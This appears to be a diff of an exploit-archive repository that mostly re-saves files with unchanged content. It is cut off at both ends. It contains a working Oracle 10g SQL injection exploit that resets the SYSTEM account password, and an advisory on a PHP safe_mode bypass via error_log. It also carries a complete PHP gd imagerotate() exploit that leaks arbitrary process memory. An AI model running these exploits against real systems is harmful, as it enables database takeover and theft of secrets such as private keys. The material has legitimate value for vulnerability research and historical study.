REPLACE FUNCTION CHANGEPASS return varchar2 -authid current_user as -pragma autonomous_transaction; -BEGIN -EXECUTE IMMEDIATE 'update sys.user$ set password=''EC7637CC2C2BOADC'' where name=''SYSTEM'''; -COMMIT; -RETURN ''; -END; -/ - -EXEC XDB.XDB_PITRIG_PKG.PITRIG_DROP('SCOTT"."SH2KERR" WHERE 1=SCOTT.CHANGEPASS()--','HELLO IDS IT IS EXPLOIT :)'); - - - - - - -/******************************************************************/ -/*************************** SEE U LATER ;) ***********************/ -/******************************************************************/ - -// milw0rm.com [2008-01-28] 
+/******************************************************************/ +/******* Oracle 10g R1 xDb.XDB_PITRIG_PKG.PITRIG_DROP **********/ +/******* SQL Injection Exploit **********/ +/******************************************************************/ +/************ exploit change system password **************/ +/******************************************************************/ +/****************** BY Sh2kerr (Digital Security) ***************/ +/******************************************************************/ +/***************** tested on oracle 10.1.0.2.0 *******************/ +/******************************************************************/ +/******************************************************************/ +/* Date of Public EXPLOIT: January 25, 2008 */ +/* Written by: Alexandr "Sh2kerr" Polyakov */ +/* email: Alexandr.Polyakov@dsec.ru */ +/* site: http://www.dsec.ru */ +/******************************************************************/ +/* Original Advisory by: */ +/* Alexandr Polyakov [ Alexandr.Polyakov@dsec.ru] */ +/* Reported: 18 Dec 2007 */ +/* Date of Public Advisory: January 15, 2008 */ +/* Advisory: http://www.oracle.com/technology/deploy/ */ +/* security/critical-patch-updates/cpujan2008.html */ +/* */ +/******************************************************************/ + + + +/* set password 12345 to user SYSTEM */ + +CREATE OR REPLACE FUNCTION CHANGEPASS return varchar2 +authid current_user as +pragma autonomous_transaction; +BEGIN +EXECUTE IMMEDIATE 'update sys.user$ set password=''EC7637CC2C2BOADC'' where name=''SYSTEM'''; +COMMIT; +RETURN ''; +END; +/ + +EXEC XDB.XDB_PITRIG_PKG.PITRIG_DROP('SCOTT"."SH2KERR" WHERE 1=SCOTT.CHANGEPASS()--','HELLO IDS IT IS EXPLOIT :)'); + + + + + + +/******************************************************************/ +/*************************** SEE U LATER ;) ***********************/ +/******************************************************************/ + +// milw0rm.com [2008-01-28] 
diff --git a/platforms/multiple/local/629.c b/platforms/multiple/local/629.c index 5c4fcbeb3..48a5d1ea1 100755 --- a/platforms/multiple/local/629.c +++ b/platforms/multiple/local/629.c @@ -116,6 +116,6 @@ return 0; scan_file(argv[1]); return 0; -} - -// milw0rm.com [2004-11-14] +} + +// milw0rm.com [2004-11-14] diff --git a/platforms/multiple/local/7171.txt b/platforms/multiple/local/7171.txt index 11409ee0d..cd90f2fe6 100755 --- a/platforms/multiple/local/7171.txt +++ b/platforms/multiple/local/7171.txt 
@@ -1,93 +1,93 @@ -[ SecurityReason.com PHP 5.2.6 (error_log) safe_mode bypass ] - -Author: Maksymilian Arciemowicz (cXIb8O3) -securityreason.com -Date: -- - Written: 10.11.2008 -- - Public: 20.11.2008 - -SecurityReason Research -SecurityAlert Id: 57 - -CWE: CWE-264 -SecurityRisk: Medium - -Affected Software: PHP 5.2.6 -Advisory URL: http://securityreason.com/achievement_securityalert/57 -Vendor: http://www.php.net - -- --- 0.Description --- -PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl -with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web -developers to write dynamically generated pages quickly. - -error_log - -They allow you to define your own error handling rules, as well as modify the way the errors can -be logged. This allows you to change and enhance error reporting to suit your needs. - -- --- 0. error_log const. bypassed by php_admin_flag --- -The main problem is between using safe_mode in global mode - -php.ini­: -safe_mode = On - -and declaring via php_admin_flag - - -... - php_admin_flag safe_mode On - - -When we create some php script in /www/ and try call to: - -ini_set("error_log", "/hack/"); - -or in /www/.htaccess - -php_value error_log "/hack/bleh.php" - - -Result: - -Warning: Unknown: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in Unknown on line 0 - -Warning: ini_set() [function.ini-set]: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in /www/phpinfo.php on line 4 - - -It was for safe_mode declared in php.ini. But if we use - -php_admin_flag safe_mode On - -in httpd.conf, we will get only - -Warning: ini_set() [function.ini-set]: SAFE MODE Restriction in effect. 
The script whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in /www/phpinfo.php on line 4 - -syntax in .htaccess - -php_value error_log "/hack/blehx.php" - -is allowed and bypass safe_mode. - -example exploit: -error_log("", 0); - -- --- 2. How to fix --- -Fixed in CVS - -http://cvs.php.net/viewvc.cgi/php-src/NEWS?revision=1.2027.2.547.2.1315&view=markup - -Note: -Do not use safe_mode as a main safety. - - --- 3. Greets --- -sp3x Infospec schain p_e_a pi3 - -- --- 4. Contact --- -Author: SecurityReason [ Maksymilian Arciemowicz ( cXIb8O3 ) ] -Email: cxib [at] securityreason [dot] com -GPG: http://securityreason.pl/key/Arciemowicz.Maksymilian.gpg -http://securityreason.com -http://securityreason.pl - -# milw0rm.com [2008-11-20] +[ SecurityReason.com PHP 5.2.6 (error_log) safe_mode bypass ] + +Author: Maksymilian Arciemowicz (cXIb8O3) +securityreason.com +Date: +- - Written: 10.11.2008 +- - Public: 20.11.2008 + +SecurityReason Research +SecurityAlert Id: 57 + +CWE: CWE-264 +SecurityRisk: Medium + +Affected Software: PHP 5.2.6 +Advisory URL: http://securityreason.com/achievement_securityalert/57 +Vendor: http://www.php.net + +- --- 0.Description --- +PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl +with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web +developers to write dynamically generated pages quickly. + +error_log + +They allow you to define your own error handling rules, as well as modify the way the errors can +be logged. This allows you to change and enhance error reporting to suit your needs. + +- --- 0. error_log const. bypassed by php_admin_flag --- +The main problem is between using safe_mode in global mode + +php.ini­: +safe_mode = On + +and declaring via php_admin_flag + + +... 
+ php_admin_flag safe_mode On + + +When we create some php script in /www/ and try call to: + +ini_set("error_log", "/hack/"); + +or in /www/.htaccess + +php_value error_log "/hack/bleh.php" + + +Result: + +Warning: Unknown: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in Unknown on line 0 + +Warning: ini_set() [function.ini-set]: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in /www/phpinfo.php on line 4 + + +It was for safe_mode declared in php.ini. But if we use + +php_admin_flag safe_mode On + +in httpd.conf, we will get only + +Warning: ini_set() [function.ini-set]: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in /www/phpinfo.php on line 4 + +syntax in .htaccess + +php_value error_log "/hack/blehx.php" + +is allowed and bypass safe_mode. + +example exploit: +error_log("", 0); + +- --- 2. How to fix --- +Fixed in CVS + +http://cvs.php.net/viewvc.cgi/php-src/NEWS?revision=1.2027.2.547.2.1315&view=markup + +Note: +Do not use safe_mode as a main safety. + + --- 3. Greets --- +sp3x Infospec schain p_e_a pi3 + +- --- 4. Contact --- +Author: SecurityReason [ Maksymilian Arciemowicz ( cXIb8O3 ) ] +Email: cxib [at] securityreason [dot] com +GPG: http://securityreason.pl/key/Arciemowicz.Maksymilian.gpg +http://securityreason.com +http://securityreason.pl + +# milw0rm.com [2008-11-20] diff --git a/platforms/multiple/local/7503.txt b/platforms/multiple/local/7503.txt index 4fac52e9d..c632647b5 100755 --- a/platforms/multiple/local/7503.txt +++ b/platforms/multiple/local/7503.txt @@ -1,23 +1,23 @@ - - -# milw0rm.com [2008-12-17] + + +# milw0rm.com [2008-12-17] diff --git a/platforms/multiple/local/7646.txt b/platforms/multiple/local/7646.txt index 55aae2764..93b59b2ca 100755 --- a/platforms/multiple/local/7646.txt +++ b/platforms/multiple/local/7646.txt 
@@ -1,376 +1,376 @@ -PHP - gd library - imageRotate()function Information Leak Vulnerability - -Discovered by: Hamid Ebadi, -Further research and exploit: Mohammad R. Roohian -CSIRT Team Members -Amirkabir University APA Laboratory - -Introduction -PHP is a popular web programming language which isnormally used as a script engine in the server side. -PHP 5 which is compiledwith gd library, includes a function called imageRotate() for rotating an imageresource by giving the rotation angle. -This function fills the resulted emptyareas with a given default coloring after rotation (clrBack). -Gd library works with both indexed images andtruecolor images. A truecolor pixel is a DWORD which stores the color value ofthe pixel which would be displayed without any change. -In indexed mode by using an index with a sizeof no more than 1 byte, the data wouldbe fetched from a color palette which consists of parallel arrays of colorbytes. The gd library uses the same data strcture for both of these image types(gdImageStruct). -An implementation error can cause information leakage from thememory of the PHP (or possible the web server) process. - -Information leak vulnerabilities allow access to e.g. the Apache memory which might contain the private RSA key for the SSL cert.If an attacker is able to read it he can perform real man in the middle attackson all SSL connections. Aside from this in the days of ASLR, NX and canaryprotections it is often vital for the success of the exploit to know exactmemory addresses. (http://www.php-security.org/) - -Vulnerableversion -PHP <= 5.2.8 -CVE Candidate Number: CVE-2008-5498 - -Vulnerability -The imageRotate() function does not perform any validation check on the clrBack parameter which is used as an index for the above mentioned arrays with the size of 255 in the index image type. 
-A correct validation check for the indexed images could be: - -file: php-x.y.z/ext/gd/libgd/gd.c - -3129: gdImagePtr gdImageRotate (gdImagePtrsrc, double dAngle, - int clrBack, int ignoretransparent) -3130:{ -3131: gdImagePtrpMidImg; -3132: gdImagePtrrotatedImg; -3133: -3134: if(src == NULL) { -3135: returnNULL; -3136: } -3137:+ -3137:+ // Index check -3137:+ if (!src->truecolor) -3137:+ clrBack &= 0xff; // Just keep the first byte -3137:+ -3138: if(!gdImageTrueColor(src) && clrBack>=gdImageColorsTotal(src)) { -3139: returnNULL; -3140: } - -While rotating indexed image, gd retrives the final backcolor from 4 parallel arrays(red, green, blue and alpha) with length of 255 and uses clrBack as the indexof these arrays. -By providing a special clrBack value (more than 255) we can read almost any address in php memory: - -file: php-x.y.z/ext/gd/libgd/gd.h - -typedef struct gdImageStruct { - - --snip snip -- - - intred[gdMaxColors]; - intgreen[gdMaxColors]; - intblue[gdMaxColors]; - - --snip snip -- - - intalpha[gdMaxColors]; - /*Truecolor flag and pixels. New 2.0 fields appear here at the - endto minimize breakage of existing object code. */ - inttrueColor; - - --snip snip -- - -} gdImage; - -typedef gdImage * gdImagePtr; - -then uses gdTrueColorAlpha macro to combinethe 4 mentioned values. gdTrueColorAlpha macro is implemented as following: - -file: php-x.y.z/ext/gd/libgd/gd.h - -#define gdTrueColorAlpha(r, g, b, a) (((a)<< 24) + \ - ((r)<< 16) + \ - ((g)<< 8) + \ - (b)) - -The final color value is the output of gdTrueColorAlpha macro which will be used as background color. gdTrueColorAlpha uses '+' (add) instead of '&'(and). While the '+' operator is slower, it also causes a security issue. By using a reverse function we can calculate almost any desired memory address. 
- -Proof of concept: -This script would cause a segmentation faultbecause -9999999 would result in reading an invalid memory address in PHP process: - - -Exploitation : -We need to provide a good clrBack to imageRotate()and then calculate the value of desired memory address by using imagecolorat() with arguments concerned with angles of the rotated image. Upper right would be a good spot (0, 0): - - - - - -------- -|f_b/\ | -| / \ | -| / \ | -|/image \| -|\ /| -| \ / | -| \ / | -| \/ | - -------- - -To read encoded memory values from a desired address, we have to use the following script: - - - -After passing $index_b as the index of arrays (red, green, blue and alphaarrays) and rotating $img (so that the values from the memory would be read), b variable takes the value of $address. -The color at [0,0] would be filled by back color,thus $f_b has the return value of gdTrueColorAlpha function. All we need to do is decoding its value. The final value of $f_b is calculated as following: -$f_b = gdTrueColorAlpha( M[$address-512], - M[$address-255], - M[$address+0], - M[$address+1034]); - -These offsets [-512, -255, 0, 1034] are the displacements in gdImageStruct's arrays. -Decoding $f_b -As you can see in the source code $f_b is calculated like this: ----------------------------------------------------------- -a :A4 A3 A2 A1 -r : R4 R3 R2 R1 -g : G4 G3 G2 G1 -b : B4 B3 B2 B1 ----------------------------------------------------------- -$f_b : F4 F3 F2 F1 ----------------------------------------------------------- - -We have used a special $index_b in order that b would have the value of memory address at $address. All we need to do is extracting b from $f_b. It is obvious that F1 has the exact value of B1( first byte of memory at $address location). To extract B2 we must have G1 values and use this equation: B2 = F2 – G1. -To calculate B3 and B4 we will also need G2, G3, R1, R2, A1. 
These bytes values can also be grabbed by using imagerotate function and sending special indexes other than $index_b. For more information see the comments in exploit source code. - - - -Exploit: -: mov 0x10(%edi,%esi,4),%ebx -mov ebx, [edi+esi*4+10] - -test case: -edi = 0x084c6128 -esi = 0xffee07b1(-1177679) values less than this will crash. -=> -ebx = 0x8047ff6 - -if (a>127) { - a = 127; -} -:( since alpha blending is on by default, the 32th bit of dumped address cant be detected. -*/ -$debug = 0; -$address = hexdec($argv[1]); -$addressSave = $address; -$count = $argv[3]+1; -$mode = $argv[2]; -$src = 0x84cde2c; -$s = 10; //image size - -$GLOBALS["image"]=imagecreate($s,$s); -$r = $GLOBALS["image"]; -if( $debug ) - echo "Image created.\n"; - -function getDataFromImage( $index ) { - $tmp = imagerotate ($GLOBALS["image"],5,$index); - return imagecolorat( $tmp, 0,0); -} - -$eor = 0; -while( $address < $addressSave+$count*4 ) { - // indexes - $index_b = (int)(($src - $address + 0x810)/4); - $index_g = $index_b + 256; - $index_r = $index_b + 512; - $index_a = $index_b - 1034; - //$index_gG is the same as index of r - $index_gR = $index_g + 512; - //$index_rG is the same as index of gR - //$index_gGg is the same as index of gR - - // fuctions - $f_b = getDataFromImage( -$index_b ); - $f_g = getDataFromImage( -$index_g ); - $f_r = getDataFromImage( -$index_r ); - $f_a = getDataFromImage( -$index_a ); - $f_gR = getDataFromImage( -$index_gR ); - - /********************* Byte 1 **********************/ - - // b byte 1 - $byte_b1 = $f_b & 0x000000ff; - if( $debug ) - printf( "b:1-0x%x\n", $byte_b1 ); - - //g byte 1 - $byte_g1 = $f_g & 0x000000ff; - if( $debug ) - printf( "g:1-0x%x\n", $byte_g1 ); - - //r byte 1 - $byte_r1 = $f_r& 0x000000ff; - if( $debug ) - printf( "r:1-0x%x\n", $byte_r1 ); - - //a byte 1 - $byte_a1 = $f_a & 0x000000ff; - if( $debug ) - printf( "a:1-0x%x\n\n", $byte_a1 ); - - /* Relative */ - - // gG byte 1 - // this is relative g to `g`( suppose that 'g' is 
a b). so its right at the position of r. - $byte_gG1 = $byte_r1; - - // gR byte 1 - // this is relative r to `g`( suppose that 'g' is a b) - $byte_gR1 = $f_gR & 0x000000ff; - - // rG byte 1 - // this is relative g to r( suppose that 'r' is a b) - $byte_rG1 = $byte_gR1; - - /* 2 Level Relative */ - - // gGg byte 1 - // this is relative g to `gG`( suppose that 'gG' is a b) - $byte_gGg1 = $byte_gR1; - - /********************* Byte 2 **********************/ - - // b byte 2 - $sum_b2_g1 = (($f_b & 0x0000ff00) >> 8 ); - $byte_b2 = $sum_b2_g1 - $byte_g1; - $borrow_b2 = 0; - if( $byte_b2 < 0 ) - $borrow_b2 = 1; - $byte_b2 = $byte_b2 & 0x000000ff; - if( $debug ) - printf( "b:2-0x%x \t0x%x\n", $byte_b2, $f_b ); - - // g byte 2 - $sum_g2_gG1 = (($f_g & 0x0000ff00) >> 8 ); - $byte_g2 = $sum_g2_gG1 - $byte_gG1; - $borrow_g2 = 0; - if( $byte_g2 < 0 ) - $borrow_g2 = 1; - $byte_g2 = $byte_g2 & 0x000000ff; - if( $debug ) - printf( "g:2-0x%x \t0x%x\n", $byte_g2, $f_gG1 ); - - // r byte 2 - $sum_r2_rG1 = (($f_r& 0x0000ff00) >> 8 ); - $byte_r2 = $sum_r2_rG1 - $byte_rG1; - $byte_r2 = $byte_r2 & 0x000000ff; - if( $debug ) - printf( "r:2-0x%x \t0x%x\n\n", $byte_r2, $sum_r2_rG1 ); - - /* Relative */ - - // gG byte 2 - $byte_gG2 = $byte_r2; - - /********************* Byte 3 **********************/ - - // b byte 3 - $sum_b3_g2_r1_br2 = (($f_b & 0x00ff0000) >> 16 ); - $sum_b3_g2_r1 = $sum_b3_g2_r1_br2 - $borrow_b2; - $sum_b3_g2 = $sum_b3_g2_r1 - $byte_r1; - $byte_b3 = $sum_b3_g2 - $byte_g2; - $borrow_b3 = 0; - if( $byte_b3 < 0 ) - { - $borrow_b3 = (int)(-$byte_b3 / 0xff) + 1; // for borrows more than one - if( $debug ) - printf( "\nborrow was: %d\n" , $borrow_b3 ); - } - $byte_b3 = $byte_b3 & 0x000000ff; - if( $debug ) - printf( "b:3-0x%x \t0x%x\n", $byte_b3, $sum_b3_g2 ); - - // g byte 3 - $sum_g3_gG2_gR1_br2 = (($f_g & 0x00ff0000) >> 16 ); - $sum_g3_gG2_gR1 = $sum_g3_gG2_gR1_br2 - $borrow_g2; - $sum_g3_gG2 = $sum_g3_gG2_gR1 - $byte_gR1; - $byte_g3 = $sum_g3_gG2 - $byte_gG2; - $byte_g3 = 
$byte_g3 & 0x000000ff; - if( $debug ) { - printf( "f_g: 0x%x\n" , $f_g); - printf( "sum_g3_gG2_gR1_br2: 0x%x\n" , $sum_g3_gG2_gR1_br2 ); - printf( "sum_g3_gG2_gR1: 0x%x\n" , $sum_g3_gG2_gR1 ); - printf( "sum_g3_gG2: 0x%x\n" , $sum_g3_gG2 ); - printf( "g:3-0x%x \t0x%x\n\n", $byte_g3, $sum_b3_g2 ); - } - - /********************* Byte 4 **********************/ - - // b byte 4 - $sum_b4_g3_r2_a1_br3 = (($f_b & 0xff000000) >> 24 ); - $sum_b4_g3_r2_a1 = $sum_b4_g3_r2_a1_br3 - $borrow_b3; - $sum_b4_g3_r2 = $sum_b4_g3_r2_a1 - $byte_a1; - $sum_b4_g3 = $sum_b4_g3_r2 - $byte_r2; - $byte_b4 = $sum_b4_g3 - $byte_g3; - $byte_b4 = $byte_b4 & 0x000000ff; - if( $debug ) { - printf( "f_b: 0x%x\n" , $f_b); - printf( "sum_b4_g3_r2_a1_br3: 0x%x\n" , $sum_b4_g3_r2_a1_br3 ); - printf( "sum_b4_g3_r2_a1: 0x%x\n" , $sum_b4_g3_r2_a1 ); - printf( "sum_b4_g3_r2: 0x%x\n" , $sum_b4_g3_r2 ); - printf( "sum_b4_g3: 0x%x\n" , $sum_b4_g3 ); - printf( "b:4-0x%x\n\n", $byte_b4); - } - /********************* Byte **********************/ - - if($mode == 0) { //text mode - printf( "%c%c%c%c", $byte_b1, $byte_b2, $byte_b3, $byte_b4); - } elseif( $mode == 1) { - // b - if( !$eor ) - printf( "0x%x:\t", $address ); - printf( "0x%x(%c)\t0x%x(%c)\t0x%x(%c)\t0x%x(%c)\t", $byte_b1, $byte_b1, - $byte_b2, $byte_b2, - $byte_b3, $byte_b3, - $byte_b4, $byte_b4 ); - - $eor = !$eor; - if( !$eor ) - echo "\n"; - } else { - $val = ($byte_b4 << 24) + ($byte_b3 << 16) + ($byte_b2 << 8) + $byte_b1; - printf( "0x%x: 0x%x\n", $address, $val ); - } - $address+=4; -} -?> - -Credit -This vulnerability has been discovered by Hamid Ebadi from Amirkabir University of Technology APA laboratory. -autcert@aut.ac.ir -https://www.ircert.cc - -Disclosure: October 2008 -Report to vendor: December, 10, 2008 - -# milw0rm.com [2009-01-02] +PHP - gd library - imageRotate()function Information Leak Vulnerability + +Discovered by: Hamid Ebadi, +Further research and exploit: Mohammad R. 
Roohian +CSIRT Team Members +Amirkabir University APA Laboratory + +Introduction +PHP is a popular web programming language which isnormally used as a script engine in the server side. +PHP 5 which is compiledwith gd library, includes a function called imageRotate() for rotating an imageresource by giving the rotation angle. +This function fills the resulted emptyareas with a given default coloring after rotation (clrBack). +Gd library works with both indexed images andtruecolor images. A truecolor pixel is a DWORD which stores the color value ofthe pixel which would be displayed without any change. +In indexed mode by using an index with a sizeof no more than 1 byte, the data wouldbe fetched from a color palette which consists of parallel arrays of colorbytes. The gd library uses the same data strcture for both of these image types(gdImageStruct). +An implementation error can cause information leakage from thememory of the PHP (or possible the web server) process. + +Information leak vulnerabilities allow access to e.g. the Apache memory which might contain the private RSA key for the SSL cert.If an attacker is able to read it he can perform real man in the middle attackson all SSL connections. Aside from this in the days of ASLR, NX and canaryprotections it is often vital for the success of the exploit to know exactmemory addresses. (http://www.php-security.org/) + +Vulnerableversion +PHP <= 5.2.8 +CVE Candidate Number: CVE-2008-5498 + +Vulnerability +The imageRotate() function does not perform any validation check on the clrBack parameter which is used as an index for the above mentioned arrays with the size of 255 in the index image type. 
+A correct validation check for the indexed images could be: + +file: php-x.y.z/ext/gd/libgd/gd.c + +3129: gdImagePtr gdImageRotate (gdImagePtrsrc, double dAngle, + int clrBack, int ignoretransparent) +3130:{ +3131: gdImagePtrpMidImg; +3132: gdImagePtrrotatedImg; +3133: +3134: if(src == NULL) { +3135: returnNULL; +3136: } +3137:+ +3137:+ // Index check +3137:+ if (!src->truecolor) +3137:+ clrBack &= 0xff; // Just keep the first byte +3137:+ +3138: if(!gdImageTrueColor(src) && clrBack>=gdImageColorsTotal(src)) { +3139: returnNULL; +3140: } + +While rotating indexed image, gd retrives the final backcolor from 4 parallel arrays(red, green, blue and alpha) with length of 255 and uses clrBack as the indexof these arrays. +By providing a special clrBack value (more than 255) we can read almost any address in php memory: + +file: php-x.y.z/ext/gd/libgd/gd.h + +typedef struct gdImageStruct { + + --snip snip -- + + intred[gdMaxColors]; + intgreen[gdMaxColors]; + intblue[gdMaxColors]; + + --snip snip -- + + intalpha[gdMaxColors]; + /*Truecolor flag and pixels. New 2.0 fields appear here at the + endto minimize breakage of existing object code. */ + inttrueColor; + + --snip snip -- + +} gdImage; + +typedef gdImage * gdImagePtr; + +then uses gdTrueColorAlpha macro to combinethe 4 mentioned values. gdTrueColorAlpha macro is implemented as following: + +file: php-x.y.z/ext/gd/libgd/gd.h + +#define gdTrueColorAlpha(r, g, b, a) (((a)<< 24) + \ + ((r)<< 16) + \ + ((g)<< 8) + \ + (b)) + +The final color value is the output of gdTrueColorAlpha macro which will be used as background color. gdTrueColorAlpha uses '+' (add) instead of '&'(and). While the '+' operator is slower, it also causes a security issue. By using a reverse function we can calculate almost any desired memory address. 
+ +Proof of concept: +This script would cause a segmentation faultbecause -9999999 would result in reading an invalid memory address in PHP process: + + +Exploitation : +We need to provide a good clrBack to imageRotate()and then calculate the value of desired memory address by using imagecolorat() with arguments concerned with angles of the rotated image. Upper right would be a good spot (0, 0): + + + + + -------- +|f_b/\ | +| / \ | +| / \ | +|/image \| +|\ /| +| \ / | +| \ / | +| \/ | + -------- + +To read encoded memory values from a desired address, we have to use the following script: + + + +After passing $index_b as the index of arrays (red, green, blue and alphaarrays) and rotating $img (so that the values from the memory would be read), b variable takes the value of $address. +The color at [0,0] would be filled by back color,thus $f_b has the return value of gdTrueColorAlpha function. All we need to do is decoding its value. The final value of $f_b is calculated as following: +$f_b = gdTrueColorAlpha( M[$address-512], + M[$address-255], + M[$address+0], + M[$address+1034]); + +These offsets [-512, -255, 0, 1034] are the displacements in gdImageStruct's arrays. +Decoding $f_b +As you can see in the source code $f_b is calculated like this: +---------------------------------------------------------- +a :A4 A3 A2 A1 +r : R4 R3 R2 R1 +g : G4 G3 G2 G1 +b : B4 B3 B2 B1 +---------------------------------------------------------- +$f_b : F4 F3 F2 F1 +---------------------------------------------------------- + +We have used a special $index_b in order that b would have the value of memory address at $address. All we need to do is extracting b from $f_b. It is obvious that F1 has the exact value of B1( first byte of memory at $address location). To extract B2 we must have G1 values and use this equation: B2 = F2 – G1. +To calculate B3 and B4 we will also need G2, G3, R1, R2, A1. 
These bytes values can also be grabbed by using imagerotate function and sending special indexes other than $index_b. For more information see the comments in exploit source code. + + + +Exploit: +: mov 0x10(%edi,%esi,4),%ebx +mov ebx, [edi+esi*4+10] + +test case: +edi = 0x084c6128 +esi = 0xffee07b1(-1177679) values less than this will crash. +=> +ebx = 0x8047ff6 + +if (a>127) { + a = 127; +} +:( since alpha blending is on by default, the 32th bit of dumped address cant be detected. +*/ +$debug = 0; +$address = hexdec($argv[1]); +$addressSave = $address; +$count = $argv[3]+1; +$mode = $argv[2]; +$src = 0x84cde2c; +$s = 10; //image size + +$GLOBALS["image"]=imagecreate($s,$s); +$r = $GLOBALS["image"]; +if( $debug ) + echo "Image created.\n"; + +function getDataFromImage( $index ) { + $tmp = imagerotate ($GLOBALS["image"],5,$index); + return imagecolorat( $tmp, 0,0); +} + +$eor = 0; +while( $address < $addressSave+$count*4 ) { + // indexes + $index_b = (int)(($src - $address + 0x810)/4); + $index_g = $index_b + 256; + $index_r = $index_b + 512; + $index_a = $index_b - 1034; + //$index_gG is the same as index of r + $index_gR = $index_g + 512; + //$index_rG is the same as index of gR + //$index_gGg is the same as index of gR + + // fuctions + $f_b = getDataFromImage( -$index_b ); + $f_g = getDataFromImage( -$index_g ); + $f_r = getDataFromImage( -$index_r ); + $f_a = getDataFromImage( -$index_a ); + $f_gR = getDataFromImage( -$index_gR ); + + /********************* Byte 1 **********************/ + + // b byte 1 + $byte_b1 = $f_b & 0x000000ff; + if( $debug ) + printf( "b:1-0x%x\n", $byte_b1 ); + + //g byte 1 + $byte_g1 = $f_g & 0x000000ff; + if( $debug ) + printf( "g:1-0x%x\n", $byte_g1 ); + + //r byte 1 + $byte_r1 = $f_r& 0x000000ff; + if( $debug ) + printf( "r:1-0x%x\n", $byte_r1 ); + + //a byte 1 + $byte_a1 = $f_a & 0x000000ff; + if( $debug ) + printf( "a:1-0x%x\n\n", $byte_a1 ); + + /* Relative */ + + // gG byte 1 + // this is relative g to `g`( suppose that 'g' is 
a b). so its right at the position of r. + $byte_gG1 = $byte_r1; + + // gR byte 1 + // this is relative r to `g`( suppose that 'g' is a b) + $byte_gR1 = $f_gR & 0x000000ff; + + // rG byte 1 + // this is relative g to r( suppose that 'r' is a b) + $byte_rG1 = $byte_gR1; + + /* 2 Level Relative */ + + // gGg byte 1 + // this is relative g to `gG`( suppose that 'gG' is a b) + $byte_gGg1 = $byte_gR1; + + /********************* Byte 2 **********************/ + + // b byte 2 + $sum_b2_g1 = (($f_b & 0x0000ff00) >> 8 ); + $byte_b2 = $sum_b2_g1 - $byte_g1; + $borrow_b2 = 0; + if( $byte_b2 < 0 ) + $borrow_b2 = 1; + $byte_b2 = $byte_b2 & 0x000000ff; + if( $debug ) + printf( "b:2-0x%x \t0x%x\n", $byte_b2, $f_b ); + + // g byte 2 + $sum_g2_gG1 = (($f_g & 0x0000ff00) >> 8 ); + $byte_g2 = $sum_g2_gG1 - $byte_gG1; + $borrow_g2 = 0; + if( $byte_g2 < 0 ) + $borrow_g2 = 1; + $byte_g2 = $byte_g2 & 0x000000ff; + if( $debug ) + printf( "g:2-0x%x \t0x%x\n", $byte_g2, $f_gG1 ); + + // r byte 2 + $sum_r2_rG1 = (($f_r& 0x0000ff00) >> 8 ); + $byte_r2 = $sum_r2_rG1 - $byte_rG1; + $byte_r2 = $byte_r2 & 0x000000ff; + if( $debug ) + printf( "r:2-0x%x \t0x%x\n\n", $byte_r2, $sum_r2_rG1 ); + + /* Relative */ + + // gG byte 2 + $byte_gG2 = $byte_r2; + + /********************* Byte 3 **********************/ + + // b byte 3 + $sum_b3_g2_r1_br2 = (($f_b & 0x00ff0000) >> 16 ); + $sum_b3_g2_r1 = $sum_b3_g2_r1_br2 - $borrow_b2; + $sum_b3_g2 = $sum_b3_g2_r1 - $byte_r1; + $byte_b3 = $sum_b3_g2 - $byte_g2; + $borrow_b3 = 0; + if( $byte_b3 < 0 ) + { + $borrow_b3 = (int)(-$byte_b3 / 0xff) + 1; // for borrows more than one + if( $debug ) + printf( "\nborrow was: %d\n" , $borrow_b3 ); + } + $byte_b3 = $byte_b3 & 0x000000ff; + if( $debug ) + printf( "b:3-0x%x \t0x%x\n", $byte_b3, $sum_b3_g2 ); + + // g byte 3 + $sum_g3_gG2_gR1_br2 = (($f_g & 0x00ff0000) >> 16 ); + $sum_g3_gG2_gR1 = $sum_g3_gG2_gR1_br2 - $borrow_g2; + $sum_g3_gG2 = $sum_g3_gG2_gR1 - $byte_gR1; + $byte_g3 = $sum_g3_gG2 - $byte_gG2; + $byte_g3 = 
$byte_g3 & 0x000000ff; + if( $debug ) { + printf( "f_g: 0x%x\n" , $f_g); + printf( "sum_g3_gG2_gR1_br2: 0x%x\n" , $sum_g3_gG2_gR1_br2 ); + printf( "sum_g3_gG2_gR1: 0x%x\n" , $sum_g3_gG2_gR1 ); + printf( "sum_g3_gG2: 0x%x\n" , $sum_g3_gG2 ); + printf( "g:3-0x%x \t0x%x\n\n", $byte_g3, $sum_b3_g2 ); + } + + /********************* Byte 4 **********************/ + + // b byte 4 + $sum_b4_g3_r2_a1_br3 = (($f_b & 0xff000000) >> 24 ); + $sum_b4_g3_r2_a1 = $sum_b4_g3_r2_a1_br3 - $borrow_b3; + $sum_b4_g3_r2 = $sum_b4_g3_r2_a1 - $byte_a1; + $sum_b4_g3 = $sum_b4_g3_r2 - $byte_r2; + $byte_b4 = $sum_b4_g3 - $byte_g3; + $byte_b4 = $byte_b4 & 0x000000ff; + if( $debug ) { + printf( "f_b: 0x%x\n" , $f_b); + printf( "sum_b4_g3_r2_a1_br3: 0x%x\n" , $sum_b4_g3_r2_a1_br3 ); + printf( "sum_b4_g3_r2_a1: 0x%x\n" , $sum_b4_g3_r2_a1 ); + printf( "sum_b4_g3_r2: 0x%x\n" , $sum_b4_g3_r2 ); + printf( "sum_b4_g3: 0x%x\n" , $sum_b4_g3 ); + printf( "b:4-0x%x\n\n", $byte_b4); + } + /********************* Byte **********************/ + + if($mode == 0) { //text mode + printf( "%c%c%c%c", $byte_b1, $byte_b2, $byte_b3, $byte_b4); + } elseif( $mode == 1) { + // b + if( !$eor ) + printf( "0x%x:\t", $address ); + printf( "0x%x(%c)\t0x%x(%c)\t0x%x(%c)\t0x%x(%c)\t", $byte_b1, $byte_b1, + $byte_b2, $byte_b2, + $byte_b3, $byte_b3, + $byte_b4, $byte_b4 ); + + $eor = !$eor; + if( !$eor ) + echo "\n"; + } else { + $val = ($byte_b4 << 24) + 